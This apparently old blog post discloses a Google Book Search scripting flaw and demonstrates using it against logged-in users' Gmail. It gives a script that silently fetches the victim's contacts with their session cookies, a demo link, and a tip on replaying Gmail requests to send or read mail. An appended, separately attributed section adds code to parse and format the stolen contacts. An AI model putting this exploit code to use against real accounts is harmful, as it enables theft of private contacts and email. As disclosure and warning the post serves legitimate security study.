Google Flaw not fixed, GMail contact stealing demo

Despite the flaw having been announced a long time ago, the Google Book Search flaw is still not fixed. It's surprising that Google isn't taking it more seriously: it is very easy to use it to drive a user's Gmail account, stealing contacts or sending email, if they are logged into Google when they're tricked into visiting such a page. The request the injected script makes carries the victim's Google cookies, so Gmail answers it as the logged-in user.

Here's an example that will list your Gmail contacts: List your gmail contacts

There's no reason why a page couldn't also send emails, steal the contents of emails, or do anything else. Given the length of time this has been public (I didn't find this flaw; it was posted to Bugtraq on the 4th of April, six days ago), it's very possible that a worm that steals Gmail information is already circulating. Disable script on google.com!

The script that gets the contacts is trivial:
function x() {
	// Synchronous GET for the Gmail contacts page. The browser attaches the
	// victim's Google cookies, so the response is the logged-in user's contacts.
	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","http://mail.google.com/mail/?view=page&name=contacts&ver=e0ad439ebad5ad16",false);
	xmlhttp.send('');
	return xmlhttp.responseText;
}
The value x() returns is a page containing a JSON structure with the contacts; this can easily be turned into the output format with a few simple regular expressions. See test6.js for those and for the complete included script. The LiveHTTPHeaders extension for Firefox is the way to find out how to do other things: watch the requests Gmail itself makes and replay them.
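As an added example (not code from the original post or from test6.js), here is the regular-expression extraction step in JavaScript. The real Gmail contacts response format is not reproduced on this page, so SAMPLE_RESPONSE is a constructed stand-in: a page whose script embeds a JSON array of [name, email] pairs. The function names are mine; fetchContactsPage is the browser-only part that mirrors x() and is not called here.

```javascript
// Constructed sample standing in for the Gmail contacts page; the real
// response shape is not shown on the page, only that it carries JSON.
const SAMPLE_RESPONSE = [
  '<html><head><title>Contacts</title></head><body><script>',
  'D(["ct",[["Alice Example","alice@example.com"],',
  '["Bob \\"Bobby\\" Example","bob@example.org"],',
  '["","nameless@example.net"]]]);',
  '</script></body></html>'
].join('\n');

// Pull [name, email] pairs out of the page text with a regular expression,
// as the post describes. The name group tolerates escaped quotes; the
// second element must look like an address so other arrays are skipped.
function extractContacts(responseText) {
  const pair = /\["((?:[^"\\]|\\.)*)","([^"@\s]+@[^"\s]+)"\]/g;
  const contacts = [];
  let m;
  while ((m = pair.exec(responseText)) !== null) {
    contacts.push({ name: m[1].replace(/\\"/g, '"'), email: m[2] });
  }
  return contacts;
}

// One "name <email>" line per contact (bare address when there is no name):
// the kind of output an attacker's page would display or ship elsewhere.
function formatContacts(contacts) {
  return contacts
    .map(c => (c.name ? `${c.name} <${c.email}>` : c.email))
    .join('\n');
}

// Browser-only: the same synchronous GET as x(), with the URL as a
// parameter. It only yields the victim's data when the page runs with
// their Google session, which is what the Book Search flaw provides.
function fetchContactsPage(url) {
  const xhr = new XMLHttpRequest();
  xhr.open('GET', url, false);
  xhr.send('');
  return xhr.responseText;
}

// Entry point for the browser case (not invoked in this file).
function listGmailContacts(url) {
  return formatContacts(extractContacts(fetchContactsPage(url)));
}
```

The regex approach is exactly as brittle as the post implies: it works because the contacts page happens to embed its data in a predictable array shape, so any change to that page breaks the scraper, while the underlying flaw (script running with the victim's session) is untouched.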

Comments

  1. debian-project mailing list Says:
    Well, that certainly got my attention. It appears to have been fixed now; or at least, the links Jibbering Jim provides don't work for me. ...